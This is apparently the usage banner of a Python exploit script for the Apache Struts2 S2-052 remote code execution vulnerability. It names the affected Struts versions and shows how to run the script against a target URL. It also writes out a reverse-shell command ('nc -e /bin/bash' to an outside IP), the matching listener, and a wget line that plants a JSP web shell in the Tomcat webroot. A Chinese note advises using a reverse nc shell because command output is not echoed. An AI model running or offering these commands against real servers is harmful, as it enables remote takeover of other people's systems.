('+-----------------------------------------------------------------------+')
('+ USE: python <filename> <url>                                          +')
('+ EXP: python struts2-052_command.py http://1.1.1.1:8080                +')
('+      [cmd]   nc -e /bin/bash 2.2.2.2 9999                             +')
('+      [shell] nc -lvvp 9999                                            +')
('+ GET: wget -P /usr/local/tomcat/webapps/ROOT/ 2.2.2.2/shell.jsp        +')
('+ VER: Struts 2.1.2-2.3.33                                              +')
('+      Struts 2.5-2.5.12                                                +')
('+-----------------------------------------------------------------------+')
('+ DES: 命令执行无法回显，但是执行正常，建议反弹nc                             +')
('+-----------------------------------------------------------------------+')